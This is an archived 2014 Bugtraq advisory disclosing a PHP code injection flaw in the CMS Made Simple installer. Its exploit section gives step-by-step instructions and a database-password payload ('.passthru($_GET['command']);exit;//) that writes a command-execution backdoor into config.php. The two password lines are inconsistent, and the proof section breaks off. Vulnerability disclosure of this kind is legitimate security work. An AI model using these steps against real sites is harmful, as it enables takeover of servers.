| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201412061540.sB6FeW0l025780@sf01web3.securityfocus.com>
Date: Sat, 6 Dec 2014 15:40:32 GMT
From: sahm@...t.com
To: bugtraq@...urityfocus.com
Subject: CMS Made Simple PHP Code Injection Vulnerability (All versions)
# CMS Made Simple PHP Code Injection Vulnerability (All versions)
# 2014-12-02
# SAHM (@post.com)
# cmsmadesimple.org
# All versions
---exploit
A malicious attacker can intrude every CMSMS-installed website by taking the following steps:
Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress).
Ex: http://URL/PATH/install
Pass through the steps to get to the fifth step.
In a remote host, install a MySQL server and create the following user:
user: test
password : '.passthru($_GET['command']);exit;//
Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) .
Fill in the Database Information form (bottom of the page).
db host address: the remote host's IP
user: test
password: '.system($_GET['command']);exit;//
database name: the name of the remote database which has been built
After installation, commands can be injected as:
http://URL/PATH?command=blah%20blah
---prove
At this point, the config.php file content would be something like this:
<?php
# CMS Made Simple Configuration File
# Documentation: /doc/CMSMS_config_reference.pdf
#
Powered by blists - more mailing lists